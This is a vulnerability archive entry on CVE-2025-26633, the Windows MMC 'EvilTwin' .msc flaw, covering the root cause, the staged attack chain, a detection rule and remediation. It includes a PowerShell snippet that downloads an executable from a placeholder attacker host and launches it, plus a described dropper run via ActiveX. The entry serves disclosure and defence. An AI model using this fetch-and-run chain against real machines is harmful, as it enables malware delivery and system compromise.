Windows MMC MSC EvilTwin - CVE-2025-26633
by sandsoncosta · 2026-05-17
- Severity
- High
- CVE
- CVE-2025-26633
- Category
- binary
- Affected product
- Microsoft Management Console (MMC), Windows
- Affected versions
- Windows versions prior to March 11, 2025 patch
- Disclosed
- 2026-05-17
- Patch status
- patched
Tags
References
Archive entry
intelseclab/poc-archiveMetadata
| Field | Value |
|---|---|
| Date Added | 2026-05-17 |
| Last Updated | 2025-04-08 |
| Author / Researcher | sandsoncosta |
| CVE / Advisory | CVE-2025-26633 |
| Category | binary |
| Severity | High |
| CVSS Score | N/A |
| Status | Patched |
| Tags | RCE, Windows, MMC, MSC, ActiveX, EvilTwin, APT, EncryptHub, Water-Gamayun, zero-day, in-the-wild |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Microsoft Management Console (MMC), Windows |
| Versions Affected | Windows versions prior to March 11, 2025 patch |
| Language / Platform | Windows, PowerShell, MSC (XML-based MMC snap-in) |
| Authentication Required | No |
| Network Access Required | No (local file delivery; social engineering required) |
Summary
CVE-2025-26633 is a zero-day vulnerability in Microsoft Management Console (MMC) that was exploited in the wild by Russian APT group Water Gamayun (EncryptHub/Larva-208). An attacker crafts a malicious .msc file that abuses the MUIPath resolution mechanism: when MMC loads the snap-in, it resolves a secondary .msc file from an attacker-controlled path and executes embedded HTML/ActiveX content in the MMC context. This enables arbitrary command execution without any user interaction beyond opening the .msc file. The vulnerability was used to deploy the EncryptHub stealer, DarkWisp backdoor, and SilentPrism backdoor, and was patched on March 11, 2025.
Vulnerability Details
Root Cause
The root cause is MMC’s MUIPath resolution logic, which allows a .msc file to reference a secondary .msc file for localized UI resources. When MMC processes this reference, it loads and renders the secondary file’s embedded HTML/ActiveX content without adequate path validation or sandbox restrictions. An attacker can substitute the expected MUI resource file with a crafted .msc containing a malicious HTML/ActiveX payload — the “EvilTwin” technique.
Attack Vector
- Attacker crafts a malicious
.mscfile that specifies aMUIPathentry pointing to an attacker-controlled.mscfile (the “evil twin”). - The evil twin
.msccontains embedded HTML with ActiveX controls that execute arbitrary commands. - Victim is social-engineered into opening the crafted
.msc(e.g., via email, download, or UNC share). - MMC loads the evil twin, the HTML/ActiveX payload runs in the MMC process context, executing arbitrary system commands.
The PoC uses a multi-stage approach:
- Stage 1 (
stage1/dropper.ps1): initial dropper/downloader - Stage 2: intermediate payload delivery
- Stage 3 (
stage3/shell.ps1): final payload execution (downloads and runs a C2 executable)
Impact
Arbitrary command execution in the context of the logged-in user via the MMC process. In the wild exploitation led to deployment of the EncryptHub information stealer, DarkWisp backdoor, and SilentPrism backdoor. If the victim has elevated privileges, full system compromise is possible.
Environment / Lab Setup
OS: Windows 10/11 (unpatched, prior to March 2025 cumulative update)
Target: Local Windows host with MMC available
Attacker: Host serving malicious .msc and stage payloads (HTTP server)
Tools: PowerShell, MMC (mmc.exe), HTTP server for payload hosting
Setup Steps
| |
Proof of Concept
Step-by-Step Reproduction
Stage 1 - Dropper — Deploy
stage1/dropper.ps1on attacker-controlled server; it downloads and executes the next stage.1 2# Hosted at http://<attacker>/stage1/dropper.ps1 # Called by the malicious .msc ActiveX payloadStage 2 - Payload Delivery — The crafted
.msc(evil twin) contains HTML/ActiveX that callsdropper.ps1viaShell.ApplicationorWScript.Shell.Stage 3 - Shell —
stage3/shell.ps1downloads the final C2 executable to%TEMP%\c2.exeand launches it.1 2 3$exePath = "$env:TEMP\c2.exe" Invoke-WebRequest -Uri "http://<attacker>/shell.exe" -OutFile $exePath Start-Process -FilePath $exePath
Exploit Code
See
stage1/dropper.ps1andstage3/shell.ps1in this folder.
Expected Output
MMC loads malicious .msc, ActiveX executes PowerShell dropper chain,
final payload (c2.exe) runs in victim context.
Screenshots / Evidence
Detection & Indicators of Compromise
SIEM / IDS Rule (example):
alert process mmc.exe spawning (powershell.exe OR cmd.exe OR wscript.exe)
msg: "MMC spawned script interpreter - possible CVE-2025-26633 exploitation"
Remediation
| Action | Detail |
|---|---|
| Patch | Apply Microsoft March 2025 Patch Tuesday update (KB patching CVE-2025-26633) |
| Workaround | Block execution of .msc files from untrusted locations via AppLocker or WDAC |
| Config Hardening | Restrict MMC snap-in execution via Group Policy; monitor for mmc.exe spawning child processes |
References
- CVE-2025-26633
- Source Repository
- Researcher Blog Post (PT-BR): CVE-2025-26633 - Como simular e identificar o ataque MSC EvilTwin
- Trend Micro - Water Gamayun / EncryptHub
Notes
Multi-stage PoC repository with separate stage directories. Stage 2 directory was present in the repo but file contents could not be retrieved due to API rate limiting at ingest time; only stage1/dropper.ps1 and stage3/shell.ps1 were saved. The actual malicious .msc file (evil twin) was not present as a standalone file in the repo root — the PoC demonstrates the chain via PowerShell stages. Attributed to Russian APT Water Gamayun (EncryptHub / Larva-208). MITRE ATT&CK coverage in researcher’s blog post.
Auto-ingested from https://github.com/sandsoncosta/CVE-2025-26633 on 2026-05-17.